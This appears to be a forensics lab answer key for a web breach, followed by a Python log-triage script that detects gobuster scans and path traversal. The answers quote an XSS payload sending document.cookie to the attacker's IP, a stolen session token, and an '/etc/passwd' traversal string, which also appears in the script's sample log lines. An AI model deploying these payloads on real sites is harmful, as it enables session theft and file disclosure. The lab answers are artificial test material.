RetailBreach Lab
Q1) In the realm of cybersecurity, identifying the attacker's IP address is pivotal for mapping the attack's scope and strategizing an effective response. What is the IP address associated with the attacker?
Answer: 111.224.180.128
Q2) Directory brute-forcing tools are known to be used by attackers seeking to uncover hidden paths within web applications. Which tool was employed by the attacker to perform directory brute-forcing?
Answer: gobuster
Q3) Cross-Site Scripting (XSS) allows attackers to inject malicious scripts into web pages viewed by users. Could you specify the XSS payload that was utilized by the attacker to compromise the web application's integrity?
Answer: fetch('http://111.224.180.128/' + document.cookie);
Q4) Pinpointing the exact moment an admin user encounters the injected malicious script is crucial for understanding the timeline of a security breach. Can you provide the UTC timestamp when the admin user first visited the page containing the injected malicious script?
Answer: 29-03-2024 12:09:50
Q5) The act of stealing a session token via XSS is a critical security breach, enabling unauthorized access. Can you provide the session token acquired and used by the attacker for unauthorized access?
Answer: lqkctf24s9h9lg67teu8uevn3q
Q6) Identifying which scripts have been exploited is a key step in mitigating vulnerabilities within a web application. What is the name of the script that was exploited by the attacker?
Answer: log_viewer.php
Q7) Exploiting vulnerabilities to access sensitive system files is a common tactic among attackers. Can you identify the payload that was used by the attacker to gain access to a sensitive system file?
Answer: ../../../../../etc/passwd
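Added example (not part of the lab or its evidence): a log-triage sketch that flags the two request patterns from Q2 and Q7, a gobuster User-Agent and a `../` sequence in a query parameter, including percent-encoded and double-encoded forms. It assumes the evidence is available as combined-format access-log lines; the sample lines, the addresses and the `file` parameter name are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in "combined" access-log format (not evidence from the lab).
# Addresses are documentation ranges; the "file" parameter name is an assumption.
SAMPLE_LOG = '''\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /admin HTTP/1.1" 404 153 "-" "gobuster/3.6"
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /backup HTTP/1.1" 404 153 "-" "gobuster/3.6"
203.0.113.7 - - [01/Jan/2024:10:05:12 +0000] "GET /log_viewer.php?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1820 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jan/2024:10:05:40 +0000] "GET /log_viewer.php?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1820 "-" "Mozilla/5.0"
198.51.100.9 - - [01/Jan/2024:10:06:00 +0000] "GET /log_viewer.php?file=error.log HTTP/1.1" 200 512 "-" "Mozilla/5.0"
'''

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')
# ".." as a whole path segment, with either slash style.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def fully_decode(value, max_rounds=5):
    """Percent-decode until stable so double-encoded input is normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def triage(log_text):
    """Return (ip, tag, detail) tuples for brute-force tooling and traversal attempts."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        if "gobuster" in m["ua"].lower():
            findings.append((m["ip"], "dir-bruteforce-ua", m["target"]))
        for name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
            decoded = fully_decode(value)
            if TRAVERSAL_RE.search(decoded):
                findings.append((m["ip"], "path-traversal", f"{name}={decoded}"))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

A User-Agent match only catches tools left at their default string, so pair it with a per-source count of 404 responses when the header has been changed.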